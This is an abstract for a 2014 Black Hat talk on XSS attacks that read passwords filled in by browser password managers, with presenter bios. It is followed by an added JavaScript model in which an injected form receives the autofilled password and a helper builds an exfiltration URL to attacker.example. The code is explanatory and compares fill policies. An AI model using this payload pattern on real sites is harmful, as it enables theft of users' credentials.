Session Identifiers are for Now, Passwords are Forever - XSS-Based Abuse of Browser Password Managers

Presented at Black Hat Europe 2014, Oct. 17, 2014, 10:15 a.m. (60 minutes)

Ever since Cross-Site Scripting (XSS) was discovered in the year 2000, one of the main goals of an XSS attack has been to take over the victim's session and, thus, their authentication context with the vulnerable web application. Consequently, the terms "XSS" and "Session Hijacking" were used as synonyms for many years. The introduction of defensive features such as HttpOnly cookies, however, keeps injected script from reading the session identifier and thereby efficiently mitigates this class of attacks. But while session identifiers are now robustly protected, another, more powerful and far longer-lived authentication credential may not be: the web user's password. As it turns out, browser-based password managers appear to be exactly the tool attackers need. To ease the burden of repeated password authentication on multiple sites, modern web browsers provide password managers that offer to automatically complete password fields on web pages once the password has been stored. Unfortunately, these managers operate by simply inserting the clear-text password into the document's DOM, where it is accessible to JavaScript. In consequence, a successful XSS attack can be leveraged by the attacker to read and leak password data that the password manager has provided.

In this presentation, we give a comprehensive overview of potential XSS-based attack patterns against browser-provided password managers. In this context, we present two systematic studies:

- For one, we examine the current generation of password managers in all (!) major browsers and show their susceptibility to the outlined attacks. We show in detail how an XSS attack can obtain the user's password from the manager and leak it to the attacker.
- Furthermore, we report on a large-scale study of the Alexa Top 4000 sites, in which we examined how password fields are used by popular websites.

We will conclude the presentation with a set of recommendations for both website operators and web users on how to protect themselves against the demonstrated attacks.
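The fill decision described above is easy to model. The following is an added illustration by the editor, not code from the talk or its authors: a small Node-runnable model of a browser password manager that fills any empty password field on a same-origin page, an XSS payload that appends its own form and reads the value the manager puts there, and a stricter fill policy that additionally requires the form action to match the one the credential was saved for. The origins, URLs and the credential are constructed sample data, and the origin-plus-action policy is this example's own assumption about one possible countermeasure, not a recommendation taken from the page.

```javascript
// Added example (not from the talk): a minimal model of a browser password
// manager's fill decision, showing why an XSS-injected form receives the
// clear-text password and how a stricter fill policy changes the outcome.
// Origins, URLs and the credential below are constructed sample data.

// One saved credential, roughly what a browser keeps after "remember password".
const SAVED_CREDENTIALS = [
  {
    origin: 'https://shop.example',
    action: 'https://shop.example/login', // form action seen when the login was saved
    username: 'alice',
    password: 'correct horse battery staple',
  },
];

// A page is modelled as its origin plus the login forms currently in its DOM.
// Each form object stands in for <form action=...> with a username and a
// password <input>; the field values are exactly what page script would read.
function makePage(origin, forms) {
  return { origin, forms: forms.map(f => ({ ...f })) };
}

// Fill policy A: fill every empty password field on a page whose origin matches
// the saved credential. The form's action is not considered, so a form that the
// attacker appended via XSS is treated exactly like the site's own login form.
function fillByOrigin(page, store) {
  for (const cred of store) {
    if (cred.origin !== page.origin) continue;
    for (const form of page.forms) {
      if (form.password === '') {
        form.username = cred.username;
        form.password = cred.password;
      }
    }
  }
}

// Fill policy B (assumed stricter variant, not described on the page): only
// fill a form whose action equals the action the credential was saved for.
function fillByOriginAndAction(page, store) {
  for (const cred of store) {
    if (cred.origin !== page.origin) continue;
    for (const form of page.forms) {
      if (form.password === '' && form.action === cred.action) {
        form.username = cred.username;
        form.password = cred.password;
      }
    }
  }
}

// The attacker's part: script running via XSS appends a form, lets the manager
// do its work, then reads the field value. The form's action points at the
// attacker, so even an ordinary submit of that form would leak the credential.
function xssInjectAndRead(page, fillPolicy, store) {
  const injected = {
    action: 'https://attacker.example/collect',
    username: '',
    password: '',
  };
  page.forms.push(injected);
  fillPolicy(page, store);   // autofill runs after the DOM has changed
  return injected.password;  // '' means the manager did not fill the injected form
}

// Exfiltration the way an XSS payload typically does it: a GET request whose
// query string carries the stolen data (only the URL is built here).
function buildExfilUrl(collector, username, password) {
  const u = new URL(collector);
  u.searchParams.set('u', username);
  u.searchParams.set('p', password);
  return u.toString();
}

// Stand-alone demo: the same injected form against both fill policies.
function demo() {
  const policies = [['origin only', fillByOrigin], ['origin + action', fillByOriginAndAction]];
  for (const [name, policy] of policies) {
    const page = makePage('https://shop.example', []);
    const leaked = xssInjectAndRead(page, policy, SAVED_CREDENTIALS);
    console.log(`${name}: ${leaked ? 'leaked via ' + buildExfilUrl('https://attacker.example/collect', 'alice', leaked) : 'injected form not filled'}`);
  }
}
demo();
```

Under policy A the injected form is filled and the payload reads the password in clear text, which is the situation the abstract describes; under policy B the site's real login form is still filled but the attacker's form stays empty, so the XSS has to fall back to tampering with the genuine form instead of simply adding one.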

Presenters:

  • Sebastian Lekies
    Sebastian Lekies is a PhD candidate at the University of Bochum. His main field of research is Web application security. In particular, he focuses on client-side Web attacks such as Cross-Site Scripting, ClickJacking, DNS-Rebinding, Cross-Site Request Forgery, etc. He regularly publishes his work at academic and non-academic security conferences such as CCS, USENIX Security, OWASP AppSec, DeepSec, etc.
  • Ben Stock - University Erlangen-Nuremberg
    Ben is currently a PhD student and research fellow at the Security Research Group of the University Erlangen-Nuremberg. His research interests lie within Web Security and Malware Analysis and he enjoys the challenges provided in Capture-the-Flag contests.
  • Martin Johns - SAP AG
    Dr. Martin Johns is a Research Expert in the Security and Trust group within SAP AG, where he leads the Web application security team. Furthermore, he serves on the board of the German OWASP chapter. Before joining SAP, Martin studied Mathematics and Computer Science at the Universities of Hamburg, Santa Cruz (CA), and Passau. During the 1990s and the early years of the new millennium he earned his living as a software engineer in German companies (including Infoseek Germany and TC Trustcenter). He holds a Diploma in Computer Science from the University of Hamburg and a Doctorate from the University of Passau. Martin has a track record of 8+ years of applied WebAppSec research, has published more than 20 papers on the subject, and is a regular speaker at international security conferences, including the OWASP AppSec series, ACSAC, ESORICS, PacSec, HackInTheBox, RSA Europe, and the CCC Congress.
